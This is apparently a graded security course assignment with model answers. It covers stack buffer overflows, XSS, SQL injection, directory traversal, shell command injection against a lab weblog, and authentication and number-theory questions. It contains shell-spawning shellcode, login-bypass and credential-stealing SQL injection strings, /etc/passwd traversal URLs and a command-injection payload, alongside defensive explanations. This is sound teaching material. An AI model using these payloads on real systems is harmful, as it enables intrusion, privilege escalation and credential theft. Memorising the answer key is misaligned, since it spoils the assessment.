Assignment 4: Local & Application Exploits
In this assignment, we explore remote to local and privilege escalation exploits used to gain or
elevate attacker access to systems. Throughout this assignment we will see these exploits used at
both the operating system as well as the application level, learn about how they happen and how we
can prevent them (both as developers as well as system administrators).
1. Buffer Overflows (75 pts)
In this section, you will be learning about buffer overflows in the stack, a common vulnerability in
programs that allows you to run arbitrary code. This lab will require some programming in C, some
knowledge of assembly, and a touch of debugging tools.
Background
Stack-based buffer overflows have been around for a long time and all indications are that they will
continue to be a problem in the near future. Aleph One wrote the definitive paper on using this
technique to exploit programs, Smashing The Stack For Fun And Profit. You should read this paper
carefully. It will walk you through every aspect of overflowing the buffer, creating a shellcode, and
ultimately exploiting a vulnerable program. It is very long and full of technical detail -- make sure to
set aside plenty of time to work through it. Also keep in mind that your Linux version and gcc
compiler may be different from those they used for the paper, so the numeric values in the examples
shown in that paper (such as pointer value, number of bytes, etc.) could be different.
Exploiting
Several strategies have been created to counter these types of bugs in programs. The version of
Linux installed on your machine employs two different kernel-based stack protection mechanisms.
One randomizes stack addresses to make it difficult to predict locations of shellcode. The other
places random canary values on the stack to protect stored addresses. You need to disable both of
these mechanisms or else it will be difficult to exploit overflows on your system.
• To disable stack protection, run the script /root/bin/disable-stack-protection (as root or
through sudo). To re-enable stack protections, run /root/bin/enable-stack-protection. Note
that if your system is ever rebooted, the stack protections will be re-enabled by default.
• To disable the placing of canary values in your executables, you need to use gcc-3.4,
which is already installed.
a. Download the zip file from strawman, examine the code in uppercase.c and
lowercase.c. These programs are simple UNIX utilities that will accept a string involving
both upper and lower case characters from the command line and return that string
converted entirely to upper case or lower case characters. Do these programs have any
internal buffers? Do they do any input length checking? Describe what seems, at first glance,
to be unsafe. Provide comments on a line-by-line basis.
(5 pts)
The local variable buf is the internal buffer (512 bytes long). The for loop uses strlen() to
bound the case conversion, but the input length is never checked against the size of buf.
strcpy() is therefore called with no limit on the length of the input and can overflow the
buffer (a bounded copy such as strncpy() should be used instead). The setuid() call is also
not recommended unless absolutely necessary.
b. Now focus on uppercase.c. Run make to compile the program. Make sure you DO
NOT compile the programs directly with gcc, as that will use gcc version 4 which inserts
canary values. Run uppercase, and find a string input that will cause it to segmentation
fault. Why does this happen?
(5 pts)
A string longer than about 524 bytes should cause the segmentation fault. This happens
because the overflowing buffer overwrites main()'s saved return address on the stack. When
main() returns, that value is loaded into the instruction pointer (%eip) and execution jumps
to an illegal address.
c. Use gdb to run the program again with the same, very long, first argument (Hint: set args
AAAAAAA...). What is the %eip address reported when it causes segmentation fault?
Compare this value to your string's ASCII hexadecimal representation (Hint: man ascii).
Determine the length of the shortest string needed to control %eip.
(5 pts)
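The shortest string recorded in my test was 529 bytes long. The %eip value reported at the
fault should match the last 4 bytes of the shortest string that causes the segmentation
fault. For an input made entirely of A characters (ASCII 0x41), it reads 0x41414141.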
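To make the comparison with the ASCII table concrete, here is a minimal sketch of how four input bytes read as a 32-bit register value on a little-endian x86 machine. The helper name bytes_as_le32 is made up for this illustration and is not part of the lab files.

```c
#include <stdint.h>

/* Interprets four consecutive bytes as a little-endian 32-bit value, the way
 * an x86 CPU loads them from the stack into a register such as %eip. */
uint32_t bytes_as_le32(const unsigned char *p)
{
    return (uint32_t)p[0]
         | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16)
         | ((uint32_t)p[3] << 24);
}
```

With the bytes "ABCD" the value is 0x44434241, so the first byte of the input ends up in the lowest byte of the register. Using distinct letters instead of a run of identical ones makes it easier to see which part of the string lands in %eip.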
d. Draw a diagram of the stack for uppercase which includes the stack frames for main()
and strcpy() and all local variables for main(). Also, include the location of main()'s
return address and how it gets overwritten by an overflown buf. Finally, include the
arguments passed to the main() program in the diagram as well, relative to the stack
frames. Exact offsets aren't that important here, but relative locations are (Hint: use print
command to know the location of local variables, arguments, etc., e.g.: print &buf).
(10 pts)
Address       Contents
0x00000000    Unused memory
              strcpy()'s stack frame
              main()'s stack frame:
                i
                buf[512]
                argv**
                argc
                Return pointer
0xbffffffa    argc, argv[], environment, etc...
If the diagram is drawn upside-down, that is also fine as long as everything is correct in
relative terms.
e. Write a new program in C which exploits this stack-based buffer overflow to execute a shell.
Your exploit should embed a shellcode in the argv[1] buffer of uppercase and then
overwrite the stack frame return address so that execution continues within that buffer
when main() returns. The shellcode you need to use is:
char scode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89"
"\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
The exploit program you will be writing should look like below:
#include <unistd.h>   /* execl() */

int main(void) {
    /* variable declaration here */
    /* preparation for exploiting here */
    /* then call execl() to invoke the uppercase program,
       where arg is a string (i.e. char[], or char*)
    */
    execl("./uppercase", "./uppercase", arg, NULL);
    return 1;   /* reached only if execl() fails */
}
As mentioned, remember to disable the stack protection and disable the canary values,
otherwise, it will be much harder to exploit.
Once you have a working exploit which executes a shell, make uppercase a setuid root
program by running chmod u+s uppercase as root. Now, run your exploit again as a non-root
user. Once your shellcode runs, use the id(1) command to determine what user the
shell is executed as. If everything works correctly, you'll have elevated privileges to root
through this overflow.
Please submit source code for your exploit that has comments on every line demonstrating
that you understand how this works. Points will be deducted for less than thorough
explanations.
(30 pts)
Before running the exploit, remember to disable the stack protection, and use gcc-3.4 for
compilation.
sample-exploit.c
another-sample-exploit.c
f. How would you modify the lowercase program to make it safe from buffer overflow
attacks?
(10 pts)
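The most basic fix is to replace strcpy() with its bounded cousin, called as
strncpy(buf, argv[1], sizeof(buf) - 1), and then to set buf[sizeof(buf) - 1] = '\0', because
strncpy() does not terminate the destination when the source is too long. The limit must
come from the size of buf, not from the length of the input string. An explicit strlen()
check that rejects arguments of sizeof(buf) bytes or more is also an option.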
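The explicit length check can be sketched as a small helper. This is only an illustration under assumptions: the name copy_checked is hypothetical and does not come from lowercase.c, and a real fix would call something like it with buf, sizeof(buf) and argv[1].

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical helper: copies src into dst only if the whole string,
 * including its terminating NUL, fits into dst_size bytes.
 * Returns 0 on success and -1 if the input is too long. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);

    if (dst_size == 0 || len >= dst_size) {
        return -1;              /* reject oversized input, do not truncate */
    }
    memcpy(dst, src, len + 1);  /* len + 1 also copies the NUL terminator */
    return 0;
}
```

Rejecting oversized input, rather than silently truncating it as strncpy() would, lets the program report the problem to the user and exit.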
g. If buf were instead allocated via malloc() in these vulnerable programs, would the same
techniques for exploitation work? Why or why not?
(5 pts)
malloc() allocates memory on the heap instead of the stack. Overflowing the heap for the
purposes of an exploit is possible, but the techniques are much different and often require
more effort, since helpful structures like return addresses and stack pointers don't generally
live in the heap.
h. What is different about executing a setuid program versus a non-setuid program? What are
the dangers of setuid programs? Why are setuid programs sometimes necessary?
(5 pts)
setuid programs execute with the privileges of the user who owns the binary, rather than
those of the user who runs it. If a vulnerability exists in a setuid binary, a local user could
exploit it to take over the account that owns it. Such programs are often necessary because
many everyday tasks require privileged access to system calls and no alternative privilege
model is available.
2. Application Exploits (100 + 20 pts)
In this section, you will explore common vulnerabilities in applications. Your experiments on a
web-based application will try to exploit vulnerabilities that are commonly found in these types
of programs.
a) Cross-site Scripting (20 pts)
Cross-site scripting vulnerabilities are common in web applications. These flaws allow you to expose
the interaction between users and a website. Read more about the different forms of XSS and how
they are typically exploited.
The application you will test on is at the URL: http://strawman/blog/. You should access this web
site from either your Windows machine or over a SSH tunnel. Locate the login page for this
application, and fuzz the form fields with HTML special characters to locate a cross-site scripting
bug.
a. Now, develop a proof-of-concept (PoC) exploit for this bug which embeds an image tag
(eg. <img src="..." />) into the page (use any image URL you want). Your injected
HTML characters must present a final page to the browser which is HTML compliant. Once
you have developed a working PoC exploit, take a screen shot of the page in your browser.
In addition, save the HTML source of the resulting, exploited page. Submit both of these in
your report.
Username:
Tester"/></td></tr><tr><td><img src="url_to_an_image_file"><div class="foo
Password:
"/></td></tr><tr><td><img src="another_image_file"><div class="bar
The page that results from the injection must still be valid HTML (e.g. every opening tag
must have a matching closing tag).
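From the developer's side, injections of this kind stop working once user input is HTML-escaped before it is written into the page. The sketch below shows the idea in C. The function name html_escape and its interface are assumptions made for this example, and the real application would use its own language's escaping facility instead.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical escaper: writes `in` to `out` with the five HTML special
 * characters replaced by entities. Returns the output length, or -1 if
 * `out` is too small. */
int html_escape(const char *in, char *out, size_t out_size)
{
    size_t j = 0;

    if (out_size == 0) return -1;
    for (size_t i = 0; in[i] != '\0'; i++) {
        char single[2] = { in[i], '\0' };
        const char *rep;

        switch (in[i]) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = single;   break;   /* ordinary character, copy as-is */
        }

        size_t n = strlen(rep);
        if (j + n >= out_size) return -1;   /* keep one byte for the NUL */
        memcpy(out + j, rep, n);
        j += n;
    }
    out[j] = '\0';
    return (int)j;
}
```

After escaping, the quote that was meant to close the attribute arrives as &quot; and the angle brackets as &lt; and &gt;, so the browser displays the injected text instead of parsing it as markup.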
b. Find an additional XSS vulnerability on a page other than the login page. This second
vulnerability should be accessible without having to log in. Write a short PoC exploit for this
second bug and record just the string you inject. You do not need to save a screenshot or
the full HTML source. Include in your report the string you used for your second XSS
exploit along with the name of page and the name of the form element you attacked.
The last link at the bottom of the page, which lets users choose the printable friendly view,
contains an additional XSS vulnerability. The injected HTML goes into the style parameter of
the URL:
http://strawman/blog/index.php?style=injected_html_code
This hole is dangerous for a second reason: pointing the parameter at a script exposes the
PHP source code of that script in the source of the returned page, for example:
http://strawman/blog/index.php?style=index.php
Note: a vulnerability in any other page (except the login page) is also acceptable.
b) SQL Injection (30 + 20 pts)
WARNING: In this section you will be manipulating the backend database of this application. There
is a small chance that your attacks will break or disable the web application. Please think carefully
about the attacks before you perform them, as other students need to use the same system. If you
do break something, report it to the lab TA immediately so it can be fixed.
SQL injection vulnerabilities are very serious flaws which open applications up to a whole host
of database attacks. These vulnerabilities affect more than just web based applications and often
allow the circumvention of authentication/access controls for information stored in a database. Also,
SQL injection flaws can sometimes be the stepping stone used by attackers to fully compromise a
database server. Read more about SQL injection through the provided references. You may also
want to search the web for more information on the topic.
a. Return to the login page of the weblog application. At least one SQL injection vulnerability
exists in this form. Develop an exploit for this form which allows one to log in to the
application without knowing a valid username or password. Hints: Imagine the SQL query a
programmer might write to check a user's credentials. The backend database is MySQL.
Also, the string -- is the SQL comment and behaves much the same as // does in
C++. Record the resulting injection string you used to log in. (10 pts)
Students must provide the injected SQL code that allows them to log in successfully as a
valid user. Example:
Username: ' or 1=1--
Password: ' or 1=1--
(MySQL treats -- as a comment only when it is followed by a space or other whitespace, so
type a space after the two dashes.)
b. Locate another SQL injection vulnerability in some other page of the application.
Develop a simple PoC exploit which demonstrates how you can manipulate the results of the
query. (10 pts)
An example: the viewentry.php page displays the entry with a specified message id. We can
change this behavior to list all entries of the weblog without navigating to the index.php
page.
The following code is injected into the msgid parameter of the viewentry.php page:
msgid=1' or '1'='1
Note: any SQL code that changes the displayed result of a page (compared to the
“official/expected” result) is considered a successful exploit.
c. Bonus question: Write an SQL injection exploit which steals a username and password from
this application's database. (20 pts)
Students must show the method/code they used to obtain the correct username and
password.
The SQL code below can be used to retrieve the usernames and passwords:
msgid=' union select 1, username, password, "" from adminuser where password <> '
The username and password of the admin user can also be discovered by running shell
commands through the injection in sendmail.php (see the Shell Command Injection section).
d. Suppose a programmer needs to run an SQL query such as:
SELECT * FROM mytable WHERE a='foo' AND b='bar'
In his application, users can completely control the data in strings foo and bar. To protect
his application against SQL injection the programmer decides to insert a backslash \ in front
of all single quote characters provided by users in these strings. This is an acceptable form
of escaping/encoding in his database system. For example, if a user provided a string
"Let's drive to the beach!", it would be encoded in the SQL query as "Let\'s
drive to the beach!". Therefore, inserting single quote characters would not allow
attackers to break out of the explicit single quotes in the query. Describe why this
protection alone would not prevent an SQL injection attack for this particular query, and
give a sample set of strings which demonstrate the problem. (Hint: Recall that the attacker
can control both strings in this query.)
(10 pts)
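Escaping only the single quote leaves the backslash itself unescaped. If the attacker types
\' the filter emits \\', which the database reads as one literal backslash followed by a
quote that closes the string. For example:
The original query:
SELECT * FROM mytable WHERE a='foo' AND b='bar'
The code injected into parameter a (with a space after the two dashes):
\' or 1=1--
The resulting query, which lists all rows in the table:
SELECT * FROM mytable WHERE a='\\' or 1=1-- AND b='bar'
Because the attacker controls both strings, a second variant ends a with a single backslash
and puts the injection into b. With a set to \ and b set to " or 1=1-- " the query becomes
SELECT * FROM mytable WHERE a='\' AND b=' or 1=1-- '
where the string for a now runs up to the quote that was meant to open b.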
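The flawed protection is easy to reproduce. The sketch below models it in C under assumptions: escape_quotes_only is a hypothetical name, and the function does exactly what the question describes, prefixing each single quote with a backslash and nothing more.

```c
#include <stddef.h>

/* Hypothetical model of the flawed escaping: puts a backslash in front of
 * every single quote and leaves existing backslashes untouched.
 * Returns the output length, or -1 if `out` is too small. */
int escape_quotes_only(const char *in, char *out, size_t out_size)
{
    size_t j = 0;

    if (out_size == 0) return -1;
    for (size_t i = 0; in[i] != '\0'; i++) {
        if (in[i] == '\'') {
            if (j + 1 >= out_size) return -1;
            out[j++] = '\\';            /* the only transformation applied */
        }
        if (j + 1 >= out_size) return -1;
        out[j++] = in[i];
    }
    out[j] = '\0';
    return (int)j;
}
```

Feeding it the attacker's string \' or 1=1-- yields \\' or 1=1-- : the backslash supplied by the attacker and the one added by the filter pair up, and the quote is left unescaped. A sound escaper would also have to escape the backslash itself, and parameterized queries avoid the problem altogether.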
c) Directory Traversal (25 pts)
Directory traversal attacks are another, somewhat less common, class of application vulnerability
which typically occurs because programmers trust some portion of a filename or file system path to
be provided by users, without validation or sanitization. These flaws often result in unauthorized file
retrieval and sometimes even facilitate remote execution attacks. Read more about directory
traversal attacks and how they are typically exploited.
a. Explore the weblog application and search for a user supplied parameter that might allow a
directory traversal attack. Once you locate one, use it to download the
system's /etc/passwd file. Submit the /etc/passwd file.
(10 pts)
Exploit the “Printable friendly format” feature mentioned in XSS attack above:
http://strawman/blog/?style=../../../../../etc/passwd
b. Pull down other files until you find positive evidence of what OS and version is hosting the
website. Save these files for your report.
(10 pts)
Similar technique as above:
http://strawman/blog/?style=../../../../../proc/version
c. Suppose a programmer accepts a filename through a URL request parameter, in a script
named safefromtraversal.php. In this script, the programmer removes all
occurrences of the string '../' from the filename provided by clients. (In other words, the
request parameter is searched for any occurrences of this string. Any found are replaced
with the 0 length string, and later the parameter is used as a filename.) With this protection
alone, would the script be secure against directory traversal attacks? If not, describe an
attack to bypass this protection.
(5 pts)
No. String replacement functions in many programming languages make a single pass and do
not rescan their own output, so attackers can send ....// for each ../ they want to inject:
removing the ../ in the middle of ....// leaves ../ behind.
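The bypass can be checked with a minimal model of such a filter. The function below is a hypothetical stand-in for whatever replacement routine safefromtraversal.php uses, and it assumes a single left-to-right pass that never rescans its own output.

```c
#include <string.h>

/* Hypothetical single-pass filter: deletes every "../" it meets while
 * scanning left to right and never rescans its own output.
 * The string is edited in place. */
void strip_dotdot_once(char *s)
{
    char *r = s;    /* read position */
    char *w = s;    /* write position */

    while (*r != '\0') {
        if (strncmp(r, "../", 3) == 0) {
            r += 3;             /* drop the match */
        } else {
            *w++ = *r++;        /* keep everything else */
        }
    }
    *w = '\0';
}
```

Applied to ....//....//etc/passwd the function returns ../../etc/passwd, which is exactly the traversal string the filter was meant to block. Repeating the replacement until nothing changes closes this particular hole, although resolving the final path and checking that it stays inside the intended directory is the more robust approach.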
d) Shell Command Injection (25 pts)
WARNING: In this section you will be running commands on the server hosting this application.
There is a small chance that your attacks will break or disable the web server or application. Please
think carefully about the attacks before you perform them, as other students need to use the same
system. If you do break something, report it to the lab TA immediately so it can be fixed.
Shell command injection, while somewhat rare, can be devastating to an application's security
because these kinds of flaws generally allow remote execution of code and are usually easy to
exploit.
The problem usually lies in an application's use of external commands to accomplish certain tasks.
Often, for the convenience of it, programmers will run external commands via the system shell or
some equivalent interface. However, if user input is included in such commands (for instance, as
command line parameters), then it is very difficult to prevent shell meta-character
injection. Read more about these attacks and how they can be prevented (accessible only through
your Windows VM.)
a. Review the pages available in the weblog application and think about what pages are most
likely to use an external command. Now, find and exploit one command injection
vulnerability. To prove you can run commands on the server, write a file
to /tmp named team-T.hack (where T is your team number) which contains the email
addresses of all of your team members. This file may contain other garbage as well, but it
should have your team members' email addresses somewhere in it. To test whether you were
successful, you can read the file back in again with the directory traversal vulnerability you
found earlier.
Hint: You may use the directory traversal vulnerability to swipe the source code for many
PHP scripts. Reviewing the sources will allow you to find such a hole very quickly.
You need to describe the method and the command, url, etc. you used to perform the attack
in your report.
(15 pts)
Students should obtain the source code of the sendmail.php page and notice that it does not
check its input before passing it to shell_exec().
The following exploit runs an arbitrary shell command via the “Contact the Webmaster”
page:
Subject: any text you want here
Body:
'; <arbitrary shell command> | /usr/sbin/sendmail -f webmaster@strawman.nslab teamXX@teamXX-router.nslab ; /bin/echo '
The output of the injected command can be read by running the mail program on the Linux
machine (in the code above, teamXX@teamXX-router.nslab is the receiving email address).
b. Consider the functions execl and system from the standard C library. Explain why
using execl is safer than system. Why would a programmer be tempted to use system?
(5 pts)
The system() function takes a single argument, the whole command line (command name plus
arguments), and calls the shell to execute it. An attacker who controls any part of that
string can therefore insert shell meta-characters to break the command into several
arbitrary commands.
The execl() function is safer because it takes the program path as its first argument and
each program argument as a separate parameter, and it runs the program directly without a
shell. The attacker's input is passed along as one literal argument, so meta-characters in it
cannot start a new command.
A programmer is nevertheless tempted to use system() because it is so easy. Moreover,
execl() replaces the current process with the new program, so to get back to the original
program the programmer must fork() before calling execl() and then wait for the child.
This extra work is perhaps the biggest disadvantage of using execl().
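The fork-then-exec pattern described above can be sketched as follows. The function name run_without_shell is an assumption made for this example, error handling is kept to a minimum, and the exit code 127 for a failed exec is a convention chosen here.

```c
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Runs `path arg` without involving a shell and returns the child's exit
 * status, or -1 on failure. `arg` reaches the program as a single argv
 * entry, whatever characters it contains. */
int run_without_shell(const char *path, const char *arg)
{
    pid_t pid = fork();

    if (pid < 0) return -1;
    if (pid == 0) {
        /* Child: replace this process image with the target program. */
        execl(path, path, arg, (char *)NULL);
        _exit(127);             /* reached only if execl() failed */
    }

    /* Parent: wait for the child so the original program can continue. */
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Calling run_without_shell("/bin/echo", "8.8.8.8; exit 3") prints the argument verbatim and returns 0: the semicolon is ordinary data because no shell ever parses it. The same string passed through system() would be split into two commands.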
c. Consider the following snippet of C code:
snprintf(cmd, 1024, "whois %s >> /tmp/whois.log", ip);
system(cmd);
Suppose an attacker could completely control the content of the variable ip, and that this
variable isn't checked for special characters. Name three different meta-characters or
operators which could allow an attacker to "break out" of ip's current position in the string
to run an arbitrary command.
(5 pts)
Three shell meta-characters an attacker is likely to use:
“;”: lets the attacker run a new command after the command specified by the
programmer.
“|”: lets the attacker pipe the output of one command into another command that is
under the attacker's control.
“>” or “>>”: lets the attacker write or append the output of a command to a file
that the attacker can read.
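If system() has to stay, the input can at least be checked against an allowlist before it is placed in the command string. The sketch below is one possible check for the ip variable of the snippet above. The function name and the exact character set are assumptions, and the check only restricts the alphabet; it does not verify that the string is a well-formed address.

```c
#include <string.h>

/* Hypothetical allowlist check: accepts only characters that can occur in a
 * textual IPv4 or IPv6 address, so that no shell operator (; | > & ` $ and
 * so on) can get through. Returns 1 if acceptable, 0 otherwise. */
int looks_like_ip_literal(const char *ip)
{
    static const char allowed[] = "0123456789abcdefABCDEF.:";
    size_t len = strlen(ip);

    if (len == 0 || len > 45) return 0;     /* 45 = longest textual IPv6 form */
    return strspn(ip, allowed) == len;      /* every character is allowed */
}
```

An allowlist is preferable to a list of forbidden characters because the shell has many more operators than the three named above, and a blacklist that misses one of them fails open.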
3. Impersonation, authentication and session keys (15 pts)
a) Explain why it is a bad idea for the initiator in a mutual authentication protocol to send out
the first challenge. [3]
It is a bad idea for the initiator in a mutual authentication protocol to send out the first
challenge because the responder then has to answer a challenge before the initiator has
proved anything, which makes the following attacks possible.
Man-in-the-middle attack
An intruder I can start the exchange itself and impersonate a valid user A to B, as shown
below.
1. I -> B: I'm A, C1
2. B -> I: I'm B, E(C1), C2
3. I -> A: I'm B, C2
4. A -> I: I'm A, E(C2), C3
5. I -> B: E(C2)
Here, I communicates with B as if it were A, using A as a decryptor.
Connection attack
An intruder can also impersonate a valid user by opening more than one connection to B,
as shown below.
1. I -> B: I'm A, C1
2. B -> I: I'm B, E(C1), C2
3. I -> B: I'm C, C2
4. B -> I: I'm B, E(C2), C3
5. I -> B: E(C2)
Here, I communicates with B as if it were A, using B itself as a decryptor through multiple
connections.
b) Consider a network such as the Internet where Trudy can inject spoofed packets in an
attempt to hijack a conversation between Alice and Bob. Trudy can send packets with
Alice’s address as the source address to Bob but the network will not deliver packets with
Alice’s address as the destination address to Trudy. What are some problems in Trudy
attempting to transmit a file to Bob by pretending to be Alice. [3]
Trudy will face the following problems:
1. If Trudy sends the file to Bob as a stream of packets over TCP, she first has to set up a
TCP connection. The three-way handshake is difficult to complete because Bob sends his
SYN-ACK to Alice, not to Trudy.
2. If Trudy instead hijacks an existing connection between Alice and Bob and sends the file
over it, Bob sends the acknowledgement for each packet to Alice. Trudy has no way to find
out whether Bob received exactly the file she sent.
3. Without any ACKs from Bob, Trudy cannot use the flow control mechanism, so she does not
know the rate at which she should transmit in order to avoid packet loss at Bob's end.
4. If the transfer uses FTP, Trudy has trouble setting up the FTP connection. She has to set
up a data connection on the port Bob sends on the control connection. Since she never sees
what Bob sends there, she cannot set up the data connection to send a file.
5. Even if Trudy hijacks an existing FTP session between Alice and Bob, she learns nothing
about connection resets or packet loss, because of the TCP problems described above.
c) Let Alice and Bob share the secret key K. Let R be a random string that is exchanged in the
clear during the authentication phase. Why are the following bad choices as session keys:
E_K(K), E_{R+K}(K) and R ⊕ K? [5]
• E_K(K): With E_K(K), every session would have the same session key, which adds little
security over not having a session key at all.
• E_{R+K}(K): R is transmitted in the clear, so the attacker can easily get hold of it. The
difficulty of guessing the session key then reduces to guessing the shared secret K, much
as in the previous case. Also, in some cases we may want to establish a session using the
shared secret K and give the session key to relatively untrusted software, as mentioned in
the 4th point of answer d. With E_{R+K}(K) as the session key, we would have to give out
the shared key to the untrusted software as well.
• R ⊕ K: R ⊕ K is not a good choice of session key because an attacker who obtains the
session key S can recover the shared secret as K = S ⊕ R, since R is sent in the clear.
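The last point is easy to verify: XOR is its own inverse, so anyone holding the session key S and the public value R recovers K with one more XOR. The helper below is a minimal sketch, and the name xor_bytes is made up for this illustration.

```c
#include <stddef.h>

/* XORs two byte strings of equal length n: out[i] = a[i] ^ b[i]. */
void xor_bytes(const unsigned char *a, const unsigned char *b,
               unsigned char *out, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        out[i] = a[i] ^ b[i];
    }
}
```

Computing S with xor_bytes(R, K, S, n) and then calling xor_bytes(S, R, recovered, n) gives back K byte for byte, which is why a leaked session key of this form also leaks the long-term secret.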
d) What are some reasons for having a session key in the first place. Why not simply use the
shared secret for encrypting the session? [4]
Following are the reasons for having a session key different from shared secret:
1. Keys wear out if used a lot. If the shared secret K is also used as the session key, an
intruder gets access to more data encrypted with K, which increases the chances of
successfully finding K.
2. The shared secret K generally stays valid much longer than a single session. If we use K
as a session key, an attacker might be able to replay messages from an old conversation.
3. If a long-term shared secret key is compromised, it is desirable that old recorded
messages still cannot be decrypted. If every conversation is encrypted with the same key K,
this would be difficult to achieve.
4. We may want to establish a session and give the session key, which is good only for that
conversation, to relatively untrusted software, rather than giving away the long-term shared
secret.
4. Secret-key Authentication (15 pts)
Alice -> KDC: N1, Alice wants Bob
KDC -> Alice: K_A(N1, K_AB, Bob, ticket); ticket = K_B(K_AB, Alice)
Alice -> Bob: ticket, K_AB(N2)
Bob -> Alice: K_AB(N2-1, N3)
Alice -> Bob: K_AB(N3-1)
a) Explain how, in the absence of N1, Trudy can impersonate Bob using an old key of Bob’s and
an old reply from the KDC. [5]
Suppose that N1 is not used at all. Trudy gets hold of an old key of Bob, K_B,old, as well as
an old reply from the KDC, R_old.
When Alice asks for a conversation with Bob, Trudy first impersonates the KDC and replays
the old message R_old, which looks like an ordinary reply from the KDC. Trudy then
impersonates Bob to Alice: she knows K_B,old and can therefore decrypt the ticket to extract
K_AB.
Alice -> Trudy (as KDC): Alice wants Bob
Trudy -> Alice: R_old = K_A(K_AB, Bob, ticket_old); ticket_old = K_B,old(K_AB, Alice)
Alice -> Trudy (as Bob): ticket_old, K_AB(N2)
Trudy -> Alice: K_AB(N2-1, N3)
Alice -> Trudy: K_AB(N3-1)
b) Why does the reply from KDC to Alice contain “Bob”? [3]
Suppose there is no “Bob” in the reply from the KDC to Alice. Trudy then changes Alice's
initial request to the KDC to {N1, “Alice”, “Trudy”}. Complying with the request it receives,
the KDC sends a ticket encrypted with Trudy's key K_T instead of Bob's key K_B. Alice cannot
tell the difference and uses this ticket to set up the conversation. Since Trudy can decrypt
the ticket, she can impersonate Bob.
Alice -> Trudy (intercepts): N1, Alice, Bob
Trudy -> KDC: N1, Alice, Trudy
KDC -> Alice: K_A(K_AT, ticket); ticket = K_T(K_AT, Alice)
Alice -> Trudy (as Bob): ticket, K_AT(N2)
Trudy -> Alice: K_AT(N2-1, N3)
Alice -> Trudy: K_AT(N3-1)
c) Explain how Trudy can impersonate Alice using an old key of Alice’ and an old reply from
the KDC [5]
Suppose that Trudy gets hold of an old key of Alice, K_A,old, and an old reply from the KDC,
R_old. R_old is encrypted with K_A,old, so Trudy can decrypt it. Trudy skips the first two
steps of the protocol: she extracts ticket_old from R_old and sends it to Bob to initiate the
conversation. Assuming that Bob's secret key K_B has not changed, Bob accepts ticket_old as a
perfectly valid request coming from Alice and proceeds with the normal conversation setup.
Thus, Trudy can impersonate Alice.
Trudy (as Alice) -> Bob: ticket_old, K_AB(N2)
Bob -> Trudy: K_AB(N2-1, N3)
Trudy -> Bob: K_AB(N3-1)
d) What is the name of the authentication protocol that underlies Kerberos? [2]
Kerberos is based on the Needham-Schroeder protocol.
5. Modular arithmetic (15 pts)
a) Which of the numbers 1,2,…,20 are coprime to 21? What is φ(21)? [5]
• The numbers between 1 and 20 that are coprime to 21 are: 1, 2, 4, 5, 8, 10, 11, 13, 16, 17,
19, 20.
• φ(21) = 12
b) What is 3^2008 mod 11? [4]
By Fermat's little theorem, 3^10 mod 11 = 1, so the exponent can be reduced mod 10:
3^2008 mod 11 = 3^(2008 mod 10) mod 11 = 3^8 mod 11 = 6561 mod 11 = 5
c) Name the two mathematical problems at the heart of most public key systems? [2]
The two mathematical problems at the heart of most public key systems are integer
factorization and the discrete logarithm problem.
d) What is repeated squaring and what is it used to compute? [4]
“Repeated squaring” is an algorithm for the fast computation of large integer powers of
a number (in cryptography, typically modular powers such as x^n mod m). For an even power
n, x^n is expressed as x^(n/2) * x^(n/2); an odd power n is first written as x * x^(n-1),
where n-1 is even, and then reduced further in the same way.
This reduces the number of multiplications needed to compute x^n to the order of log_2 n,
compared to the naïve algorithm's n-1.
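A minimal sketch of repeated squaring for modular powers follows. It is the iterative form of the same idea, walking through the bits of the exponent instead of recursing. The name mod_pow is chosen for this example, and the code assumes a modulus below 2^32 so that no intermediate product overflows 64 bits.

```c
#include <stdint.h>

/* Computes (base^exp) mod m by repeated squaring.
 * Assumes 1 <= m < 2^32 so that every product fits in 64 bits. */
uint64_t mod_pow(uint64_t base, uint64_t exp, uint64_t m)
{
    uint64_t result = 1 % m;    /* 1 % m also handles m == 1 */

    base %= m;
    while (exp > 0) {
        if (exp & 1) {
            result = (result * base) % m;   /* this bit of exp is set */
        }
        base = (base * base) % m;           /* square for the next bit */
        exp >>= 1;
    }
    return result;
}
```

mod_pow(3, 2008, 11) returns 5, the same value as in part b, after 11 loop iterations instead of 2007 multiplications.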
Note: Diagram from Wikipedia.